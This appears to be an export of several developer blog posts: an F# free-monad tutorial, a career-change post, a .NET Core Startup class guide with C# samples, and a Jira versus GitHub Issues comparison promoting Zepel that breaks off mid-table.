let bind (f: 'a -> ChargeUserOperation<'b>) (a: ChargeUserOperation<'a>) =
match a with
| LookupUser (userId, next) -> ??
| ChargeCreditCard (amount, card, next) -> ??
| EmailReceipt (unit, next) -> ??
| Return x -> f x
```
As usual we've used a pattern match to unwrap the `ChargeUserOperation` in order to get at the inner value. In the case of `Return` it's a straightforward case of just calling `f` on the value `x`. But what about the other operations? We don't have a value of type `'a` to hand, so how can we invoke `f`?
Well what we do have to hand is `next` which is capable of producing a new `ChargeUserOperation` when supplied with a value. So what we can do is call that and recursively pass this new `ChargeUserOperation` to `bind`. The idea being that by recursively calling `bind` we'll eventually hit the `Return` case, at which point we can successfully extract the value and call `f` on it.
```fsharp
module ChargeUserOperation =
let rec bind (f: 'a -> ChargeUserOperation<'b>) (a: ChargeUserOperation<'a>) =
match a with
| LookupUser (userId, next) -> LookupUser(userId, (fun user -> bind f (next user)))
| ChargeCreditCard (amount, card, next) ->
ChargeCreditCard(amount, card, (fun transactionId -> bind f (next transactionId)))
| EmailReceipt (email, next) ->
EmailReceipt(email, (fun () -> bind f (next())))
| Return x -> f x
```
This might be a bit mind bending, but another way to view it is that we're just doing exactly the same callback nesting that we were forced to do by hand when we previously wrote `chargeUser`. Except now we've hidden the act of nesting these operations inside the `bind` function.
Each call to bind introduces another layer of nesting and pushes the `Return` down inside this new layer. For example if we had written `LookupUser(userId, Return) |> bind (fun user -> ChargeCreditCard(amount, user.CreditCard, Return))` it would be equivalent to writing it in nested form like `LookupUser(userId, (fun user -> ChargeCreditCard(amount, user.CreditCard, Return)))`.
With that we can easily write a computation expression called `chargeUserOperation` and use it to flatten that pyramid in `chargeUser`.
```fsharp
type ChargeUserOperationBuilder() =
member _.Bind(a, f) = ChargeUserOperation.bind f a
member x.Combine(a, b) = x.Bind(a, (fun () -> b))
member _.Return(x) = Return x
member _.ReturnFrom(x) = x
member _.Zero() = Return()
let chargeUserOperation = ChargeUserOperationBuilder()
let chargeUser (amount: float) (userId: UserId) =
chargeUserOperation {
let! user = LookupUser(userId, Return)
let! transactionId = ChargeCreditCard(amount, user.CreditCard, Return)
match user.EmailAddress with
| Some emailAddress ->
let email =
{ To = emailAddress
Body = $"TransactionId {transactionId}" }
do! EmailReceipt(email, Return)
return transactionId
| None -> return transactionId
}
```
If `do!` is unfamiliar, it's basically just `let!` except that it ignores the result, which we don't care about when sending the email because it returns `unit` anyway.
# Making data look like functions 🥸
The function is looking pretty nice now, but it's perhaps a bit unnatural to have to write `LookupUser(userId, Return)` instead of just `lookupUser userId`. It's also a bit annoying to have to constantly keep writing `Return` as the final argument to the `ChargeUserOperation` case constructors. Well it's easy to fix that, we can just write a "smart constructor" for each case that hides that detail away.
```fsharp
let lookupUser userId = LookupUser(userId, Return)
let chargeCreditCard amount card = ChargeCreditCard(amount, card, Return)
let emailReceipt email = EmailReceipt(email, Return)
let chargeUser (amount: float) (userId: UserId) =
chargeUserOperation {
let! user = lookupUser userId
let! transactionId = chargeCreditCard amount user.CreditCard
match user.EmailAddress with
| Some emailAddress ->
do!
emailReceipt
{ To = emailAddress
Body = $"TransactionId {transactionId}" }
return transactionId
| None -> return transactionId
}
```
🔥 Nice! Now the function perfectly expresses the logic of our operation. It looks just like a regular monadic function, except under the hood it's actually building up an abstract data structure that represents our desired computation, rather than invoking any real calls to real infrastructure.
# Factoring out a functor
Our `chargeUser` function is looking pretty good now, but there are some optimisations we can make to the definition of `ChargeUserOperation`. Let's consider what would happen if we wanted to write a different computation. We'd have to write a data type with a case for each operation we want to support, plus a case for `Return`, and then finally implement `bind` for it. Wouldn't it be nice if we could implement `bind` once for any computation type?
Let's take a look at the definition of `bind` for `ChargeUserOperation` again and see if we can refactor it to something a bit more generic.
```fsharp
let rec bind (f: 'a -> ChargeUserOperation<'b>) (a: ChargeUserOperation<'a>) =
match a with
| LookupUser (userId, next) -> LookupUser(userId, (fun user -> bind f (next user)))
| ChargeCreditCard (amount, card, next) ->
ChargeCreditCard(amount, card, (fun transactionId -> bind f (next transactionId)))
| EmailReceipt (email, next) ->
EmailReceipt(email, (fun () -> bind f (next ())))
| Return x -> f x
```
If we mandate that each operation must be of the form `Operation of ('inputs * ('output -> Operation<'next>))` then the operations only differ by parameter types, which we can make generic. How should we do this for `ChargeCreditCard` though, given that it currently has two inputs? Well, we can combine the inputs into a single tuple like this: `ChargeCreditCard of ((float * CreditCard) * (TransactionId -> ChargeUserOperation<'next>))`.
The form of `bind` for each operation is now identical, specifically it is `Operation(inputs, next) -> Operation(inputs, (fun output -> bind f (next output)))`. So really, we actually only have two cases to consider: either it's an `Operation` or it's a `Return`. So let's create a type called `Computation` that encapsulates that.
```fsharp
type Computation<'op, 'next> =
| Operation of 'op
| Return of 'next
```
Which we can write `bind` for to turn it into a monad.
```fsharp
let rec inline bind (f: 'a -> Computation< ^op, 'b >) (a: Computation< ^op, 'a >) =
match a with
| Operation op -> Operation(op |> map (bind f))
| Return x -> f x
```
The trick to making this work in the `Operation` case is to note that we require each `Operation` to be mappable. That is, we require it to be a functor. Mapping an operation is just a case of applying a function to its return value to transform it into something else. So by calling `map` with `bind f`, as we did recursively when writing `bind` for `ChargeUserOperation`, we push the binding down into each operation until we eventually hit the `Return` case, at which point we get access to the return value and can apply `f` to it.
So now when we're writing our operations we've reduced the task from having to implement `bind` to instead having to implement `map`, which is an easier task. For example we can express `ChargeUserOperation` like this.
```fsharp
type ChargeUserOperation<'next> =
| LookupUser of UserId * (User -> 'next)
| ChargeCreditCard of (float * CreditCard) * (TransactionId -> 'next)
| EmailReceipt of Email * (unit -> 'next)
static member Map(op, f) =
match op with
| LookupUser (x, next) -> LookupUser(x, next >> f)
| ChargeCreditCard (x, next) -> ChargeCreditCard(x, next >> f)
| EmailReceipt (x, next) -> EmailReceipt(x, next >> f)
```
Unfortunately, we can't eliminate any more boilerplate beyond here in F#. In other languages like Haskell it is possible to automatically derive the `Map` function for the operation functors, but in F# using FSharpPlus the best we can do today is write the `static member Map` ourselves. FSharpPlus then provides us the `map` function which will automatically pick the correct one by calling this `static member Map` when mapping an instance of `ChargeUserOperation` through the use of statically resolved type parameters.
We just have one final change to make to the smart constructors. Now that `ChargeUserOperation` is just a functor, we need to lift the operations up into the `Computation` monad by wrapping them in an `Operation`. (The `computation` builder used below is defined in the same way as `chargeUserOperation` was, just using the generic `bind`.)
```fsharp
let lookupUser userId = LookupUser(userId, Return) |> Operation
let chargeCreditCard amount card =
ChargeCreditCard((amount, card), Return) |> Operation
let emailReceipt email =
EmailReceipt(email, Return) |> Operation
let chargeUser (amount: float) (userId: UserId) =
computation {
let! user = lookupUser userId
let! transactionId = chargeCreditCard amount user.CreditCard
match user.EmailAddress with
| Some emailAddress ->
do!
emailReceipt
{ To = emailAddress
Body = $"TransactionId {transactionId}" }
return transactionId
| None -> return transactionId
}
```
# You just discovered the Free Monad 🥳
The data type we called `Computation` is usually called `Free`, the `Operation` case is often called `Roll` and the `Return` case is often called `Pure`. Other than that though we've discovered the basis of the free monad. It's just a data type and associated `bind` function that fundamentally describes sequential computations.
If you're a C# developer familiar with LINQ then this might seem familiar. LINQ provides a way to build up a computation and defer its evaluation until some time later. It's what allows LINQ to run in different environments, such as in a database, because people are able to write interpreters for it that turn the LINQ statements into SQL on the database server.
# Should I use free monads 🤔
You might be wondering whether to use free monads in F# in your project. On the one hand they provide an excellent means of abstraction when it comes to defining computations in a domain model. They're also a joy to test because we can just interpret them as pure data and verify that for a given set of inputs we have produced the right data structure and hence computation; no more mocking 🙌.
Another plus is that with free monads we've actually achieved what object oriented programmers would call the interface segregation principle. Each computation only has access to the operations it needs to do its work. No more injecting wide interfaces into domain handlers and then having to write tests that verify we didn't call the wrong operation; it's literally impossible under this design!
On the other hand, it seems to be pushing F# to its limits, as it really requires features like higher-kinded types, which F# doesn't support. So we have to resort to making heavy use of statically resolved type parameters to make it work. You might also find them to be quite abstract, although I hope that this post has at least helped make their usage seem more intuitive, even if the internal implementation is still quite abstract.
On balance I don't think there's a one-size-fits-all answer here. You're going to have to weigh up the pros and cons for your project and team and decide whether this level of purity is worth it in order to warrant overcoming the initial learning curve and potentially cryptic compiler errors when things don't line up.
If you're thinking of taking the plunge and giving them a try then I would recommend using [FSharpPlus](https://fsprojects.github.io/FSharpPlus/reference/fsharpplus-data-free.html) which has done all the hard work of defining the free monad machinery for you. Also see the appendix at the end for a full example using FSharpPlus.
# What did we learn 🧑🎓
The name free monad might be cryptic and even misleading at first, but the concept is relatively straightforward. Free monads are just a data structure that represents a chain of computations that should be run sequentially. By building a data structure we're able to leave it up to someone else to come along and interpret it in any way they see fit. They're "free" to do it how they need to, provided they respect the ordering of the computations in the data structure we have handed to them.
A free monad is just a way for us to describe our computation in very abstract terms. We're placing the fewest restrictions possible on what the computation has to do and making no assumptions about how it should be done. We've completely decoupled the "what" from the "how", which is one of the fundamental pillars of good Domain Driven Design, because it means that the domain model is a pure abstract representation of the problem at hand unburdened by the details of how it is hosted.
# Next time ⏭
We've covered a lot in this post but we haven't talked about how we actually go about running these computations. So far we've just built some abstract representations of them in data. Next time we'll see how we can actually interpret them to do some real work.
## Appendix
If you want to see a complete, top-to-bottom, example of writing a free monadic workflow using FSharpPlus, then I've included one in the section below.
{% details %}
```fsharp
#r "nuget: FSharpPlus"
open FSharpPlus
open FSharpPlus.Data
type ChargeUserOperation<'next> =
| LookupUser of UserId * (User -> 'next)
| ChargeCreditCard of (float * CreditCard) * (TransactionId -> 'next)
| EmailReceipt of Email * (unit -> 'next)
static member Map(op, f) =
match op with
| LookupUser (x, next) -> LookupUser(x, next >> f)
| ChargeCreditCard (x, next) -> ChargeCreditCard(x, next >> f)
| EmailReceipt (x, next) -> EmailReceipt(x, next >> f)
let lookupUser userId = LookupUser(userId, id) |> Free.liftF
let chargeCreditCard amount card =
ChargeCreditCard((amount, card), id) |> Free.liftF
let emailReceipt email =
EmailReceipt(email, id) |> Free.liftF
let chargeUser (amount: float) (userId: UserId) =
monad {
let! user = lookupUser userId
let! transactionId = chargeCreditCard amount user.CreditCard
match user.EmailAddress with
| Some emailAddress ->
do!
emailReceipt
{ To = emailAddress
Body = $"TransactionId {transactionId}" }
return transactionId
| None -> return transactionId
}
```
When writing the smart constructors here, e.g. `lookupUser`, we pass the identity function, `id`, as the second argument. The reason is that `Free.liftF` maps the functor with `Pure` and then lifts it up with `Roll`. So by using `id` and then calling `Free.liftF` we end up with the desired `Roll (LookupUser(userId, Pure))`. The other way to think of `id` here is that the default "callback" when creating an operation is to just return the value produced by this computation and not do anything else.
{% enddetails %} | choc13 |
695,298 | Answer: | answer re: What does 256 means for 12... | 0 | 2021-05-11T22:56:52 | https://dev.to/nonsameer/answer-3fpl | ---
title: Answer:
published: true
---
{% stackoverflow 38483586 %} | nonsameer | |
695,417 | You're Hired! | I was near tears when I heard those words from my new manager. After months and months of... | 12,672 | 2021-05-17T16:23:00 | https://corydorfner.com/youre-hired | career, beginners, learning, motivation | I was near tears when I heard those words from my new manager. After months and months of self-learning, both about myself and programming, I finally have my first job in the tech field and can happily say I made the switch from a career in Manufacturing Quality to Technology.

Starting May 24<sup>th</sup>, my new title will be that of a Software Test Engineer for Cox Automotive. Now, I know what you're thinking, "Cory, your social media says you're a Full-Stack Developer. Why are you happy with a Software Test Engineer role?". Well, there are numerous reasons for that, such as the fact that I'm less than a year into my career path transformation, I've found a great company to work for, and understand that there is a lot more for me to learn and grow from within the tech industry itself. I will go into further detail on all of these points, and more, within the other posts of this series, so be sure to stick around and read them when they come out. One key item to remember when reading through these though; I'm not done yet.

There will always be more to learn about in this industry, different ways to grow and develop yourself as an individual and programmer, and a better way to approach and solve issues that we must master. This is what makes us engineers and what we must tackle day in and day out with an optimistic and joyful mindset. Without these key values in our life, we're certain to fall behind the next person and be overlooked in our careers so it's vital to be continually improving. The keyword here is *continually*. Most people think they have to be *continuously* improving, but that frequently leads to stress, burnout, and overall poor results. By *continually* improving, you provide yourself with sufficient breaks and pauses to relax and enjoy life. Ralph Waldo Emerson once said, "Life is a journey, not a destination". I strive to live my life every day by the message of his quote.
While I work hard and push myself to get things done quickly and correctly, I never put my mental health and sanity over that of studying and work. This is what I would like each and every one of you to take away from this series. It's never too late or difficult to follow your dreams and make them a reality. It of course will take hard work and dedication, but you can get there, just like I have and will continue doing.

Be sure to stay tuned for the next post in the series by following me here and on social media too! The links to my social media accounts can be found on the [contact page](https://corydorfner.com/contact/) of my personal website. Thank you and I look forward to your comments below!:wave:
| dorf8839 |
695,584 | .Net Core Startup Class Guide | The Startup class is a single place to configure services and the app's request pipeline.... | 0 | 2021-05-12T05:17:13 | https://medium.com/c-sharp-progarmming/net-core-startup-class-guide-27b1d3232b67 | csharp, dotnet, todayilearned, programming | #### The Startup class is a single place to configure services and the app's request pipeline.
#### The Startup class explained as follows:
- It contains an optional **ConfigureServices** method to configure app services. A service is a reusable module that provides functionality.
- Services are registered in the **ConfigureServices** method and consumed throughout the application via **dependency injection**.
- It includes a **Configure** method to build the app's request processing pipeline.
**ConfigureServices** and **Configure** are called by the **.NET Core runtime** when the app begins executing:
```
public class Startup
{
public Startup(IConfiguration configuration)
{
Configuration = configuration;
}
public IConfiguration Configuration { get; }
public void ConfigureServices(IServiceCollection services)
{
services.AddRazorPages();
}
public void Configure(IApplicationBuilder app, IWebHostEnvironment env)
{
if (env.IsDevelopment())
{
app.UseDeveloperExceptionPage();
}
else
{
app.UseExceptionHandler("/Error");
app.UseHsts();
}
app.UseHttpsRedirection();
app.UseStaticFiles();
app.UseRouting();
app.UseAuthorization();
app.UseEndpoints(endpoints =>
{
endpoints.MapRazorPages();
});
}
}
```
Specify the Startup class in the app's host builder. The Startup class is typically specified by calling the `WebHostBuilderExtensions.UseStartup<TStartup>` method on the host builder inside the Program.cs file, as shown below.
```
public class Program
{
public static void Main(string[] args)
{
CreateHostBuilder(args).Build().Run();
}
public static IHostBuilder CreateHostBuilder(string[] args) =>
Host.CreateDefaultBuilder(args)
.ConfigureWebHostDefaults(webBuilder =>
{
webBuilder.UseStartup<Startup>();
});
}
```
The host provides services that are accessible to the Startup class constructor. The app attaches additional services via the ConfigureServices method. Both the host and app services are available to Configure and throughout the app.
The following services can be injected into the Startup class constructor:
- IWebHostEnvironment
- IHostEnvironment
- IConfiguration
### Multiple Startup Classes
At runtime, the appropriate Startup class is selected when the app defines separate Startup classes for various environments.
The class whose name matches the current environment is prioritized. For example, if the app includes both a **Startup** class and a **StartupDevelopment** class, and the app is running in the Development environment, then the **StartupDevelopment** class will be used.
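One way to enable this convention is to pass the assembly name to `UseStartup` instead of a type argument, so the host resolves the `Startup{EnvironmentName}` class at runtime. A minimal sketch:
```
public static IHostBuilder CreateHostBuilder(string[] args) =>
    Host.CreateDefaultBuilder(args)
        .ConfigureWebHostDefaults(webBuilder =>
        {
            // With an assembly name, hosting looks for a class named
            // Startup{EnvironmentName} (e.g. StartupDevelopment) and
            // falls back to Startup if no matching class is found.
            webBuilder.UseStartup(typeof(Program).Assembly.FullName);
        });
```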
### The ConfigureServices method
The ConfigureServices method is:
- Optional.
- Called by the host before the Configure method, to configure the app's services.
- Also the conventional place to set configuration options.
```
public class Startup
{
public Startup(IConfiguration configuration)
{
Configuration = configuration;
}
public IConfiguration Configuration { get; }
public void ConfigureServices(IServiceCollection services)
{
services.AddDbContext<ApplicationDbContext>(options =>
options.UseSqlServer(
Configuration.GetConnectionString("DefaultConnection")));
services.AddDefaultIdentity<IdentityUser>(
options => options.SignIn.RequireConfirmedAccount = true)
.AddEntityFrameworkStores<ApplicationDbContext>();
services.AddRazorPages();
    }
}
```
### The Configure method
The Configure method specifies how the app responds to HTTP requests. The request pipeline is configured by adding middleware components to an IApplicationBuilder instance.
The .NET Core templates configure the pipeline with support for:
- Developer Exception Page
- Exception handler
- HTTP Strict Transport Security (HSTS)
- HTTPS redirection
- Static files
- ASP.NET Core MVC and Razor Pages
```
public class Startup
{
public Startup(IConfiguration configuration)
{
Configuration = configuration;
}
public IConfiguration Configuration { get; }
public void ConfigureServices(IServiceCollection services)
{
services.AddRazorPages();
}
public void Configure(IApplicationBuilder app, IWebHostEnvironment env)
{
if (env.IsDevelopment())
{
app.UseDeveloperExceptionPage();
}
else
{
app.UseExceptionHandler("/Error");
app.UseHsts();
}
app.UseHttpsRedirection();
app.UseStaticFiles();
app.UseRouting();
app.UseAuthorization();
app.UseEndpoints(endpoints =>
{
endpoints.MapRazorPages();
});
}
}
```
**Use** extension methods add one or more middleware components to the request pipeline. For example, the UseStaticFiles method adds the middleware that serves static files.
Each middleware component in the pipeline is responsible for invoking the next component, or for short-circuiting the chain when appropriate.
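This hand-off can be seen in a minimal inline middleware (the header name here is chosen purely for illustration): calling `next()` passes the request to the rest of the pipeline, while omitting the call short-circuits it.
```
public void Configure(IApplicationBuilder app)
{
    // Inline middleware: runs for every request.
    app.Use(async (context, next) =>
    {
        // Work before the rest of the pipeline runs.
        context.Response.Headers["X-Handled-By"] = "InlineMiddleware";

        await next(); // invoke the next component; omit to short-circuit

        // Work after the downstream components have produced a response.
    });

    // Terminal middleware: ends the pipeline.
    app.Run(async context =>
    {
        await context.Response.WriteAsync("Hello from the pipeline!");
    });
}
```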
Additional services can be injected into the Configure method signature, such as:
- IWebHostEnvironment
- ILoggerFactory
- Anything defined in ConfigureServices
#### Configure services without Startup
To configure services and the request processing pipeline without a Startup class, call the ConfigureServices and Configure convenience methods on the host builder.
Multiple calls to ConfigureServices append to one another. If multiple Configure method calls exist, the last Configure call is used.
```
public class Program
{
public static void Main(string[] args)
{
CreateHostBuilder(args).Build().Run();
}
public static IHostBuilder CreateHostBuilder(string[] args) =>
Host.CreateDefaultBuilder(args)
.ConfigureAppConfiguration((hostingContext, config) =>
{
})
.ConfigureWebHostDefaults(webBuilder =>
{
webBuilder.ConfigureServices(services =>
{
services.AddControllersWithViews();
})
.Configure(app =>
{
var loggerFactory = app.ApplicationServices
.GetRequiredService<ILoggerFactory>();
var logger = loggerFactory.CreateLogger<Program>();
var env = app.ApplicationServices.GetRequiredService<IWebHostEnvironment>();
var config = app.ApplicationServices.GetRequiredService<IConfiguration>();
logger.LogInformation("Logged in Configure");
if (env.IsDevelopment())
{
app.UseDeveloperExceptionPage();
}
else
{
app.UseExceptionHandler("/Home/Error");
app.UseHsts();
}
var configValue = config["MyConfigKey"];
});
});
}
```
#### You have learned
- Startup class methods and their description.
- Multiple startup classes as per the environment.
- Building a .NET Core app without a Startup class.
**Thank you for reading. I hope you liked the article!**
<a href="https://www.buymeacoffee.com/sukhpindersingh" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 41px !important;width: 174px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
If GitHub is where developers reside, Jira is what most software development teams use to keep tabs on their progress.
Both these tools have become a household name when it comes to tracking issues and managing projects. So, how are they different? What are their pros and cons? And ultimately, which [project management software](https://zepel.io/blog/free-project-management-software/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github) is better for your software development team?
Before we get to answering these questions, let's have a quick overview of the two issue tracking project management apps.
---
## Quick Overview of Jira
Atlassian created Jira in the year 2002 and it was initially built to be an issue and bug tracking application.

Now, Jira software has grown into an agile project management tool catering to software development teams, small and big. Jira offers a plethora of functionalities and integrations with more than 2,000 third-party applications. Yet, its USP remains the same to this day - issue tracking.
Most teams that are new to project management get started with Atlassian's Trello. And once they require more functionality, they later move to Jira after comparing [Trello vs Jira](https://zepel.io/blog/jira-vs-trello/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github).
Since most software companies are opting for Jira, should you too? Let’s find out.
### The pros and the cons of Jira
Although Jira software is a pioneer in project management tools, with most apps being modelled on it, it has its pros and cons.
#### The pros:
- Atlassian’s Jira is an expert at capturing bugs in your product that can then be assigned to members, prioritized and tracked to completion.
- Jira software lets you add story points to each issue to quantify the work required to be done and also group related issues using its Epic issue type
- Jira software has agile capabilities that supports frameworks such as [scrum and kanban](https://zepel.io/agile/scrum-vs-kanban/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github) with features like scrum and [kanban boards](https://zepel.io/agile/kanban/what-are-kanban-boards/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github).
- Jira is flexible and has a workflow builder that enables you to customize your workflow by setting up rules to define how a work item should move from one status to another.
- Advanced configurations help you control who can view what work items in which kanban columns.
- Roadmap functionality aids in a quick overview of the entire project and to track overall progress.
- A huge collection of more than 2000 third-party apps for use cases ranging from CRM to code review, and more.
#### The cons:
- Jira software’s design is not a developer’s favourite as it appears to be streamlined on the outside but leads to micromanagement when you dive inside.
- Most developers also hate this app for its slow speed.
- Jira software’s primary unit of work is an issue and not a task which is terrible as you’ll only think of tickets and not features.
- Jira’s agile capabilities lack finesse when it comes to implementing frameworks like scrum, unlike Zepel. You don’t get the elegant [Sprints](https://zepel.io/features/sprints/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github) view that has built-in agile reports such as burnup and [burndown](https://zepel.io/agile/reports/burndown/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github) charts. So, check out alternative [scrum tools](https://zepel.io/blog/scrum-tools/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github) if it is your priority.
- Jira software’s learning curve is steep, making onboarding new members a living hell.
- If you fail to set advanced configurations right, miscommunication and lost productivity within your squad can occur.
- Jira software enables you to collect bugs and support tickets from customers via its external service desk but doesn’t allow you to bring in tickets from various customer feedback platforms such as Canny, Intercom, etc., like [Zepel’s Streams](https://zepel.io/guide/streams/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github) does.
- Even though you can create customized workflows, creating it becomes a nightmare due to its complex design.
- The [pricing plan](https://www.atlassian.com/software/jira/pricing) limits onboarding to only 10 members in the free plan and unlike Zepel, it comes with certain functionality restrictions.
<a href="https://zepel.io/?utm_source=devto&utm_medium=mid-image&utm_campaign=jira-vs-github" class="import-image"><img src="https://zepel.io/blog/content/images/2021/05/CTA-1.png" alt="Zepel, dev-friendly project management tool that's more than an issue tracker" style="max-width:700px;width:100%;"></a>
---
## Quick Overview of GitHub Issues
Joining as a recent addition to the list of [Jira alternatives](https://zepel.io/blog/jira-alternative/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github) is GitHub. This tool is every developer's best friend; the platform where most of the product development and code collaboration happens.
Popularly known for source code management, GitHub has now expanded its horizons from version control to project management. And it is rising to fame as a popular replacement for Jira, as it can do most of what Jira can do. Moreover, it's where the code is.

Akin to Jira software, this app uses bug tracking as a means of measuring progress. So, instead of thinking in terms of tasks and features, you will be working on tickets. Although this approach might seem simpler, it can become very difficult to build quality software.
Therefore, is GitHub cut out for handling projects? Read on to find out.
### Pros and Cons of GitHub Issues for Project Management
Just like any other app, GitHub also has its pros and cons that will help you decide if this is the app for your org.
#### The pros:
- GitHub is where the code is and so you wouldn’t need to leave your current workflow to update your work item’s status.
- GitHub’s project boards have useful templates such as basic kanban, automated kanban, automated kanban with triggers for PR review status to help prioritize work and customize workflows. *[Here are some kanban board examples for inspiration](https://zepel.io/blog/9-kanban-board-examples/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github).*
- GitHub Actions enables you to automate all your workflows effortlessly.
- GitHub can be integrated with almost every software application available in the market today.
- GitHub’s [pricing plan](https://github.com/pricing) is quite affordable.
#### The cons:
- Unlike Jira software and Zepel, GitHub lacks powerful agile capabilities other than simple kanban software and Milestones for scrum.
- It lacks traditional project management functionalities such as file sharing and messaging, customizable dashboards, and multiple views like Gantt/Timeline, List view, etc.
- GitHub Issues helps collect customer requests for features, enhancements, or fixing bugs. You can even bring them in as imports from external sources like Canny and Intercom. But it isn't as elegant as Zepel’s Streams.
- Unlike Atlassian’s Jira, GitHub doesn’t have story points to capture and quantify the work required to be completed
- GitHub’s way of grouping issues together using labels or milestones is poor in comparison to Jira software’s Epic
- Lacks permissions that help you control who has access to what data.
- GitHub isn’t friendly to non-technical people as it isn't intuitive and so it isn't meant for cross-functional teams.
- Although the pricing is affordable, only public repositories are free.
---
## Feature Comparison of Jira vs GitHub
<table class="tg" style="undefined;table-layout: fixed; width: 100%;">
<colgroup>
<col style="width: 111px">
<col style="width: 302px">
<col style="width: 326px">
</colgroup>
<thead>
<tr>
<th class="tg-0lax"></th>
<th class="tg-amwm"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Jira Software</span></th>
<th class="tg-amwm"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">GitHub</span></th>
</tr>
</thead>
<tbody>
<tr>
<td class="tg-1wig"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Agile planning</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Jira provides agile capabilities such as </span><a href="https://zepel.io/features/scrum-board/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github" target="_blank" rel="noopener noreferrer"><span style="font-weight:400;font-style:normal;text-decoration:underline;color:#15C;background-color:transparent">scrum</span></a><br><a href="https://zepel.io/features/scrum-board/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github" target="_blank" rel="noopener noreferrer"><span style="font-weight:400;font-style:normal;text-decoration:underline;color:#15C;background-color:transparent">boards</span></a><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">, </span><a href="https://zepel.io/features/kanban-board/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github" target="_blank" rel="noopener noreferrer"><span style="font-weight:400;font-style:normal;text-decoration:underline;color:#15C;background-color:transparent">kanban boards</span></a><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">, </span><a href="https://zepel.io/agile/reports/?utm_source=devto&utm_medium=text&utm_campaign=jira-vs-github" target="_blank" rel="noopener noreferrer"><span style="font-weight:400;font-style:normal;text-decoration:underline;color:#15C;background-color:transparent">agile reports</span></a><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">, etc., to</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">implement both scrum and kanban painlessly.</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">GitHub lacks powerful agile capabilities like Jira</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">and </span><span style="color:#000;background-color:transparent">offers only simple kanban boards and</span><br><span style="color:#000;background-color:transparent">Milestones for scrum sprints.</span></td>
</tr>
<tr>
<td class="tg-1wig"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Ease of use</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Easy to set up and use but the user</span><br><span style="color:#000;background-color:transparent">experience and onboarding is hellish due to</span><br><span style="color:#000;background-color:transparent">the complexity in its design.</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Easy to use for developers and engineering teams</span><br><span style="color:#000;background-color:transparent">but difficult for new technical users and non</span><br><span style="color:#000;background-color:transparent">technical members as it isn't intuitive.</span></td>
</tr>
<tr>
<td class="tg-1wig"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Developer-</span><br><span style="color:#000;background-color:transparent">friendliness</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Atlassian Jira enables pretty deep integrations</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">with GitHub, GitLab, and Bitbucket. However,</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">it is extremely slow. Also, its workflows are</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">over-engineered, causing micromanagement.</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">This makes jira a tool developers hate. </span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">GitHub is a tool loved by developers as it's where</span><br><span style="color:#000;background-color:transparent">they spend most of their time doing what they love</span><br><span style="color:#000;background-color:transparent">- coding. And managing work items here is a</span><br><span style="color:#000;background-color:transparent">bonus as they don’t need to leave their current</span><br><span style="color:#000;background-color:transparent">workflow.</span></td>
</tr>
<tr>
<td class="tg-1wig"><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">Features &</span><br><span style="font-weight:700;font-style:normal;text-decoration:none;color:#000;background-color:transparent">functionality</span></td>
<td class="tg-0lax"><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">The core functionality of Jira is bug tracking</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">and its unit of work is a ticket. You can add</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">story points to issues and group them using its</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">epic issue type, unlike GitHub. But its core</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">concept forces your team to think in terms of</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">tickets instead of outcomes. </span><br><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">When it comes to features, Jira has plenty of</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">them - from multiple views to roadmap and</span><br><span style="font-weight:400;font-style:normal;text-decoration:none;color:#000;background-color:transparent">custom dashboards.</span></td>
